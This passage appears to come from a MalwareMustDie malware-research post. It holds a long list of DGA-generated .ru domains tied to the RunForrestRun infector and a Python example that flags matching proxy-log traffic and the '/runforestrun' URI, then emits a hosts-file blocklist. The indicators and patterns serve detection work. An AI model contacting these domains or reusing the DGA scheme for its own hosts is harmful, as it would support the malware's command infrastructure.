zgsxmhffvnizvxft.ru
mtuloilstrcfoykq.ru
yfxueilamhutmmnr.ru
ksyiaulnbpgnxpjs.ru
wfcsvebxgiynxlbc.ru
jsehchxfgboukksb.ru
vehpowijritygngg.ru
isjdecxytkoiazad.ru
uemmazcuvorvsadb.ru
grnzukxvhqnjfana.ru
sdqirxitzjgxxxhf.ru
frswwkcwyjwmrorb.ru
rdvfkzvdqxpufsep.ru
eqxsyluecdcxpped.ru
qdbewgrvhvwygvlo.ru
cqcrrdgweomwshmp.ru
ocfaopqtguzswofi.ru
bpholidutrkjmtpp.ru
nckwyplkpfqczmxl.ru
znlfqprdgejpllxi.ru
mbosgirfmfoygmhk.ru
xnqbiapjqcpvvcqz.ru
kbtpctegrcuillhc.ru
wmuxxiagzhcieofr.ru
jaymuwnpcjtqcwot.ru
vmzukuabemehxwpw.ru
hzbkqtgarqrmdlcx.ru
qqafbwfwjrflbmdo.ru
deeskswjfulkurjc.ru
ppfbslcowvdivwmr.ru
cejpdwxlftekbrch.ru
npkxjvsffuotzmij.ru
adnmvxwbyzjwvasg.ru
moouumrwtvnetzfu.ru
ybrdscaecknwugpu.ru
lotqnwonxpgigjox.ru
xawyilvvdurtcltc.ru
joynyhkerylsfygl.ru
vzzvoqbscqsnmrqr.ru
indlredwgvungvsq.ru
uyethhnsehcfqilz.ru
hniitysuwprckvzs.ru
syjqyvrpyohlexgj.ru
fmmflppopijsipdr.ru
ryonlorhvoekruec.ru
emrbflbunrcqrjgk.ru
qxsjdyodxeyyechp.ru
dlwxvurpfeyqyqcj.ru
oxxguneutbrhtsjx.ru
blbwpvcyztrepfue.ru
nwcenehdgqyxtssq.ru
zjfndnhwdsrwephi.ru
mwhbjgismatmjuji.ru
yikkpeqinkedjnxs.ru
kvmxjgblbhjgpjvw.ru
wipgnmjxfgwttrlf.ru
jvqtbrrbikxribjl.ru
vhtdynyciknmkblg.ru
tmlrjxvvrvkyxofn.ru
gbogvuamqydsxcgz.ru
smpovxvnxkelrgzt.ru
eatdfntzfgqrprmj.ru
qlulnseexvzpptcm.ru
dzvyrlqebdcolbei.ru
plzhfkuhkocvqwvx.ru
cybxcikisigkmqtl.ru
olegrpgtdxosnnkc.ru
aygtmclwegxsmjid.ru
mkjdkbwuxcnuxtqd.ru
yvklttrmfvygrvwk.ru
lknyzylpjzkasnmo.ru
xvphlknpxewklsyd.ru
kjsvlbwoxhcbtfpq.ru
vvteeuevhpbpepfi.ru
ijxsncuprepwqzlt.ru
uuyavjatmoykgodf.ru
hicqgipogsjulrgn.ru
tudygcklurkthcmt.ru
gihnijebfitftukm.ru
rtivxqoindugifaf.ru
ehmjatkmhnivwxdo.ru
qtnrpbmfuierqstw.ru
dhqgdpbdxrusdxcw.ru
psroiljvwkqrnfqf.ru
bhvdnklorkjcfppd.ru
nswltcjxwwnbrljp.ru
agabgtdhgsbspwsq.ru
mrcjwchanjuilitl.ru
yefscrehgfveysyc.ru
wjvftsujnszcvevs.ru
jwwtixcvymcflhob.ru
vibeglyuxuzbkgbo.ru
hwcrlxhvrevsnzwl.ru
tifbsmujkhbvbkyj.ru
gvhodonxvblrghch.ru
shkwimusoizncvhx.ru
fvllwtyeleporhen.ru
rhotamrrectjqfto.ru
duqhgptpqmsyyrqj.ru
phtqmnbhcmyknyss.ru
cuveztrnrgnshbgp.ru
ogymeohrjxfscgfs.ru
btacsqzlgctcxjei.ru
mgdlwkvcgkygcqck.ru
yretgeoqsvdnikar.ru
lfihodgqdjmfqppt.ru
xrjpymuxzutqaudg.ru
kfnebggkwsjlxzbk.ru
wqomqwbvtwiwejid.ru
ierbdycqkclubnex.ru
uqsiihfbyeotruuc.ru
hewwcxblormskqae.ru
tpxfuxwvnqcmekoi.ru
gdbvudwhpnuwrdls.ru
spdenojggmdrlixc.ru
edgsojssutkqjbxg.ru
qohaffgzdpnksohx.ru
ddloyfnurjprfwnb.ru
pomwopzpscwqxpfv.ru
zfguwvhdmjlutvwo.ru
mtiidqbknpskzasp.ru
xflrjyyjswoatsoq.ru
ksmfflbpefxgfdsv.ru
wepnhoeeodiklyar.ru
jsrcwahdmdarwmto.ru
veukmrlhkghlqqjn.ru
irwxwuybkwltqnhx.ru
tezhfswbxfnnuhbd.ru
grbwyglkgkieiybk.ru
sdefwonjqnujdoxr.ru
fqgtjwvcrkmuhkco.ru
rdjcjrxljzaughvt.ru
eqkplxtjjuhkbeqs.ru
pcoyyxsfhsyysfme.ru
cppmejjneikodxrc.ru
ocsuqiqvvknfvcjp.ru
bpujwsmplvftnqcx.ru
nbxrjalwllvnbmfs.ru
znyzszkdrxgnovuq.ru
lbcpvpxigyferhws.ru
xmexlajhysktwdqe.ru
kahmnunornwrgpgb.ru
wmiudbgrcvapriql.ru
jzkitejvrxgkgpgi.ru
ulnrpbudycxzdlkt.ru
hyoflopkupjioiqq.ru
tlrnhskrgijhwtlj.ru
gytcnulxsxpsqkfn.ru
skwkybckmywhrhbb.ru
dernflilrdxmfnye.ru
ppsvcvrcgkllplyn.ru
bdvkpbuldslsapeb.ru
npxsiiwpxqqiihmo.ru
adbjjkquyyhyqknf.ru
mocrafrewsdjztbj.ru
yafzvancybuwmnno.ru
lohnrnnpvvtxedfl.ru
wakvnkyzkyietkdr.ru
jnlkttkruqsdjqlx.ru
vznrahwzgntmfcqk.ru
inqgvoeohpcsfxmn.ru
uyrorwlibbjeasoq.ru
gmvdnpqbblixlgxj.ru
sywleisrsstsqoic.ru
fmacqvmqafqwmebl.ru
rxbkqfydlnzopqrn.ru
elfxqghdubihhsgd.ru
qxggipnnfmnihkic.ru
clkujrjqvexvbmoi.ru
owldagkyzrkhqnjo.ru
blorcdyiipxcwyxv.ru
nwpykqeizraqthry.ru
zisiiogqigzzqqeq.ru
mvuvchtcxxibeubd.ru
xixftoplsduqqorx.ru
kvzstpqmeoxtcwko.ru
whddmvrxufbkkoew.ru
jveqgnmjxkocqifr.ru
vhhzcvbegxbjsxke.ru
iujniiokeyjbmerc.ru
gacdiuwnhonuulpe.ru
rmdlgyreitjsjkfq.ru
ezfydrexncoidbus.ru
qlihxnncwioxkdls.ru
dyjvewshptsboygd.ru
plmekaayiholtevt.ru
cyosongjihugkjbg.ru
nkrbvqxzfwicmhwb.ru
axtopsbtntqnfdyk.ru
mkwwclogcvgeekws.ru
yvxfekhokspfuwqr.ru
ljbvfrsvcevyfhor.ru
xvcewyydwsmdgaju.ru
jjgshrjdcynohyuk.ru
vuhaojpwxgsxuitu.ru
iiloishkjwvqldlq.ru
uumwyzhctrwdsrdp.ru
hiplksflttfkpsxn.ru
ttqtkmthptxvwiku.ru
fhuidtlqttqxgjvn.ru
rtvqcdpbqxgwnrcn.ru
ehyewyqydfpidbdp.ru
qsbourrdxgxgwepy.ru
dhedppigtpbwrmpc.ru
osflhkaowydftniw.ru
bgjzhlasdrwwnenj.ru
nrkhysgoltauclop.ru
zenquqdskekaudbe.ru
mroeqjdaukskbgua.ru
ydrngsmrdiiyvoiy.ru
krtbityuhlewigfe.ru
jwkpdxqbemsmclal.ru
uinyjmxfqinkxbda.ru
hvpmffxpfnlquqxo.ru
tisubmfvqrgnloxr.ru
gvujhzvjxwptrtdg.ru
shxrsvasoncjnxpn.ru
fuyfrockpfclxccd.ru
qhcplcuugevvyham.ru
dueebwwdllfburag.ru
pghnrmkoeoetfwsm.ru
ctjbmgjudwisgshv.ru
ogmjjmqdhlbyabzg.ru
atnwerhvttvbivra.ru
mfqfrnqllqcrayiw.ru
yrrnrgliojezjctg.ru
lfvcngdbzjrzgyby.ru
xqwkdyjydkggsppd.ru
keabgwmpzqhpmlng.ru
vqcicnuhtwhxmtjd.ru
iefwvulgninlkoxe.ru
upgghggmbusopaxv.ru
hektxucstnbuncix.ru
tplczomvebjmhsgk.ru
gdoqznfilmtulxxv.ru
ropypfmcqjjfdiel.ru
edtmjcvfnfcbweed.ru
qouubrmdxtgnnjvm.ru
dcyjurmfwhgvyoio.ru
pozrtgdmhvhvdscn.ru
ccdifvomwhtynpay.ru
nneplwlvlcojiegm.ru
lsvdxjpwykxxvryd.ru
xfymtpavzblzbknq.ru
ksacasnubklrikdl.ru
wedkgpdcxlrunbmu.ru
jrfyaswntteouafv.ru
veihxoqukuetxqbn.ru
hrkusbnevtmyisab.ru
tdndpphrtyniynvz.ru
gqortbbbsnksxpmm.ru
sdrzgpowhyckaogu.ru
fqtooihtbhwdxskt.ru
rcwwrqssqrrfpgvd.ru
dpxkgybdgttbeyfh.ru
pcbukgjlihpvehyu.ru
cpdjalvpsvfgqtbd.ru
obgrcxuqunmquthx.ru
bpifbqdpzavdjljq.ru
nbloiroucuvotnck.ru
ymmwxgaimxgqtrdv.ru
lapkpatjbkubfxeu.ru
xmqspbcjfttkibbg.ru
kauhrjmdqenmtyvk.ru
wlvpilfxnxpdoujt.ru
jzxdofqtnlusever.ru
ulbnairmbptfscka.ru
hyccqffkdslpbuue.ru
tkfksqvkqdhspdsm.ru
gyhxgveinbdufdnt.ru
skkhxjykeyukyebl.ru
exmubcrfgpaijgzx.ru
opgsgmrejtyazcrf.ru
bdjhtgqhggicwrmy.ru
nolpsdqvivphcoew.ru
zboxoswkbebgarsh.ru
moplknnccyfkesaj.ru
yasuaexybixmvnge.ru
knuidyekzkyuhtpi.ru
wzvqmhzpppziurdl.ru
jnyfopdfycjyfomx.ru
vybofxkqmidtcnhq.ru
imedqfzemirxjqhn.ru
tyflwmgobjignmbd.ru
gmjzqviddrqumknm.ru
sxkiifqgzmsjvxzn.ru
fmnvbcuebuoyhxgq.ru
rxoebpmmwjgsphyp.ru
elsskgujckxkdqry.ru
pwtbsyitleslzngt.ru
clxpvwfqexkciciu.ru
owyxdqwgvlyndmwr.ru
bkcnxdtvxcjpyobq.ru
nwdvufzkpszkvxxk.ru
zigfmudoxbqehljf.ru
lvishxhsbgoyclva.ru
xhlbffbmicnnxpsk.ru
kvnoygvsciiyrnlp.ru
whqxutzyuwvaijbq.ru
jurlbjnqmycnjoat.ru
vhutmessbhrhonso.ru
huwiddttqzujegjk.ru
tgzqyfhfekefmnuv.ru
rlqglzqqhehmtryd.ru
eystwwslgmwxzqsu.ru
qlvcdbyuturxcusx.ru
dywqzqyouieuojub.ru
pkabphfegwhtnoug.ru
bycojtqkhamhawoj.ru
nkfxfqvofqbuhuuz.ru
axhlltpcxcixsdhv.ru
mjktxpzccvifevpc.ru
yvlcjbweeheoixyj.ru
ljoqjstmgdotqyll.ru
wupyyjwqhozwdpcb.ru
jitnlsxlmbtdzmwf.ru
vuuurusnjxorennj.ru
iiyjdtxigdyuyzcz.ru
utzrdmsexiffrltv.ru
hidifzbettjuadfh.ru
steqvhuhrqsmynoh.ru
fhifzexvhegcjtdx.ru
rsjmnrjedkuvhwfs.ru
ehmbrpusljbmykrn.ru
qsojzcltslhstxnj.ru
dgrxbomayxjhdike.ru
ossgrsfecodjxjhy.ru
bgwutpbwpbcrzthd.ru
nrxcdfhydmlcnoay.ru
zdbnzonswqhjphqh.ru
mrcblkrgikgxxtwc.ru
xdfjryydcfwvkvui.ru
kqhxgmvevducviey.ru
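Two things in this post translate directly into detection: the IFRAME URL shape "/runforestrun?sid=..." given near the top, and the decoded domain list just above, every entry of which is 16 lowercase letters under .ru. The script below is an added example (not code from this post or from the MMD tools) that scans proxy log lines for either indicator, marks exact list hits and the runforestrun URI as high confidence and a bare 16-letter .ru host as low confidence, and turns the domain list into a hosts-file blocklist. The log format (timestamp, client IP, method, URL) and the log lines themselves are constructed for the example; the known-domain set is the four domains the post found alive.

```python
"""Flag RunForrestRun-style infector traffic in proxy logs and emit a blocklist.

Added example, not code from the MalwareMustDie post. The proxy log layout
"timestamp client method url" is an assumption; the "/runforestrun?sid="
URI and the 16-letter .ru domain scheme are taken from the post.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Subset of the decoded DGA domains listed in the post (the four seen alive).
KNOWN_DGA_DOMAINS = frozenset({
    "bumggasfaoywfncc.ru",
    "vvteeuevhpbpepfi.ru",
    "ijxsncuprepwqzlt.ru",
    "knuidyekzkyuhtpi.ru",
})

# Every decoded domain in the post is exactly 16 lowercase letters under .ru.
DGA_SHAPE = re.compile(r"^[a-z]{16}\.ru$")

# Constructed proxy log lines: one known infector hit, one benign site,
# one host that only matches the DGA shape, one short .ru host.
SAMPLE_LOG = [
    "2013-08-08T10:15:02Z 10.0.0.15 GET http://bumggasfaoywfncc.ru/runforestrun?sid=botnet2",
    "2013-08-08T10:15:05Z 10.0.0.15 GET http://www.example.com/index.html",
    "2013-08-08T10:16:11Z 10.0.0.22 GET http://zzzzzzzzzzzzzzzz.ru/favicon.ico",
    "2013-08-08T10:17:40Z 10.0.0.31 GET http://yandex.ru/",
]


def classify_url(url):
    """Return (host, reasons); an empty reasons list means nothing matched."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    reasons = []
    if host in KNOWN_DGA_DOMAINS:
        reasons.append("known-dga-domain")
    elif DGA_SHAPE.match(host):
        reasons.append("dga-shaped-domain")  # shape only, no list hit
    if parts.path.lower() == "/runforestrun" and "sid" in parse_qs(parts.query):
        reasons.append("runforestrun-uri")
    return host, reasons


def scan_proxy_log(lines):
    """Scan log lines and return one finding per suspicious request."""
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line, skip rather than crash the scan
        timestamp, client, _method, url = fields[:4]
        host, reasons = classify_url(url)
        if not reasons:
            continue
        strong = {"known-dga-domain", "runforestrun-uri"}
        confidence = "high" if strong.intersection(reasons) else "low"
        findings.append({
            "time": timestamp,
            "client": client,
            "host": host,
            "reasons": reasons,
            "confidence": confidence,
        })
    return findings


def hosts_blocklist(domains, sink="0.0.0.0"):
    """Render domains as hosts-file lines pointing at a non-routable sink."""
    return "\n".join(f"{sink} {domain}" for domain in sorted(set(domains)))


if __name__ == "__main__":
    for finding in scan_proxy_log(SAMPLE_LOG):
        print(finding["confidence"], finding["client"], finding["host"], ",".join(finding["reasons"]))
    print(hosts_blocklist(KNOWN_DGA_DOMAINS))
```

For real use, replace KNOWN_DGA_DOMAINS with the full 365-domain list above; the shape-only rule stays useful for spotting the next day's domain before it appears in any list, but expect it to need review since a 16-letter .ru hostname is not proof on its own.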

#MalwareMustDie!